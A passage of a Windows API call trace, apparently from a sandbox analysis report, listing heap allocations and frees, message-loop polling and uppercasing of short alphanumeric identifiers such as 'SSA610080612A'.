HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.752] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.752] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0163.752] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.752] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0163.752] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0163.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.753] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.753] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0163.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.755] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.756] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.756] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0163.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0163.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0163.758] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0163.758] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.758] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.759] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0163.759] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.760] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0163.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.760] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0163.760] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.760] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.760] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.761] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0163.761] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0163.761] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.761] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0163.761] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.761] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.762] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.762] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0163.762] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.762] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.762] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0163.763] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.763] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0163.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 